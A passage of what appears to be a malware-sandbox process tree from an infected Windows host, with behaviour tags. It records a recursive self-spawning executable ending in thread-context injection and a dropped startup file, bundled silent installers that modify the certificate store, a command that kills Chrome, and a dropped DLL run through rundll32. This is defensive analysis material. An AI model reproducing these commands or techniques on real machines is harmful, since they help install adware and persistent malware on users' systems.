                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                  43⤵
                                                                                                                                                                                                                                    PID:7376
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                      44⤵
                                                                                                                                                                                                                                        PID:4600
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                          45⤵
                                                                                                                                                                                                                                            PID:5708
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                              46⤵
                                                                                                                                                                                                                                                PID:6468
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                  47⤵
                                                                                                                                                                                                                                                    PID:5668
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                      48⤵
                                                                                                                                                                                                                                                        PID:5916
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                          49⤵
                                                                                                                                                                                                                                                            PID:7412
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                              50⤵
                                                                                                                                                                                                                                                                PID:6188
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                  51⤵
                                                                                                                                                                                                                                                                    PID:1336
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                      52⤵
                                                                                                                                                                                                                                                                        PID:2804
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                          PID:8140
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                            54⤵
                                                                                                                                                                                                                                                                              PID:8272
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                55⤵
                                                                                                                                                                                                                                                                                  PID:8380
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                    56⤵
                                                                                                                                                                                                                                                                                      PID:8440
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                        57⤵
                                                                                                                                                                                                                                                                                          PID:8548
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                            58⤵
                                                                                                                                                                                                                                                                                              PID:8664
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                59⤵
                                                                                                                                                                                                                                                                                                  PID:8728
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    60⤵
                                                                                                                                                                                                                                                                                                      PID:8824
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                        61⤵
                                                                                                                                                                                                                                                                                                          PID:8868
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                            62⤵
                                                                                                                                                                                                                                                                                                              PID:8964
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                63⤵
                                                                                                                                                                                                                                                                                                                  PID:9044
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                    64⤵
                                                                                                                                                                                                                                                                                                                      PID:9124
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                        65⤵
                                                                                                                                                                                                                                                                                                                          PID:8116
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                            66⤵
                                                                                                                                                                                                                                                                                                                              PID:8216
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                67⤵
                                                                                                                                                                                                                                                                                                                                  PID:5256
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                    68⤵
                                                                                                                                                                                                                                                                                                                                      PID:8392
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                        69⤵
                                                                                                                                                                                                                                                                                                                                          PID:5404
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                            70⤵
                                                                                                                                                                                                                                                                                                                                              PID:7960
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                71⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8596
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                    72⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8708
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                        73⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6132
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                            74⤵
                                                                                                                                                                                                                                                                                                                                                              PID:8944
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                75⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8916
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                    76⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:9088
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                        77⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5284
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                            78⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:8288
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                79⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:8388
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                    80⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:7544
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                        81⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4608
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                            82⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:8556
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                83⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7764
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                    84⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:8732
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                        85⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:8904
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                            86⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6448
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                87⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9212
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                    88⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8384
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                        89⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8412
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                            90⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3280
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                                91⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8844
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                                    92⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6164
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                                        93⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8604
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                                            94⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5492
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                                                95⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8504
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                                                    96⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8684
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                                                        97⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8708
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          98⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6352
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                      ping GFBFPSXA -n 30
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                      PID:7392
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:5176
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:5520
                                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:4816
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:5344
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                    PID:4080
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:2256
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NGKS8.tmp\VPN.tmp
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NGKS8.tmp\VPN.tmp" /SL5="$102FC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                            PID:5248
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-KN1KR.tmp\Setup.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-KN1KR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:7004
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-V1308.tmp\Setup.tmp
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-V1308.tmp\Setup.tmp" /SL5="$203F0,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-KN1KR.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                  PID:6652
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:7928
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                        tapinstall.exe remove tap0901
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                        PID:5564
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:5812
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:7428
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:7932
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:7684
                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                    PID:5912
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      PID:5928
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RG2MN.tmp\y1zbD3v3ueFwlrbTrKoho_BL.tmp
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RG2MN.tmp\y1zbD3v3ueFwlrbTrKoho_BL.tmp" /SL5="$1041C,138429,56832,C:\Users\Admin\Documents\y1zbD3v3ueFwlrbTrKoho_BL.exe"
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                    PID:6336
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-H81D4.tmp\Setup.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-H81D4.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:5860
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                          PID:7416
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629279843 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:6936
                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        PID:6820
                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
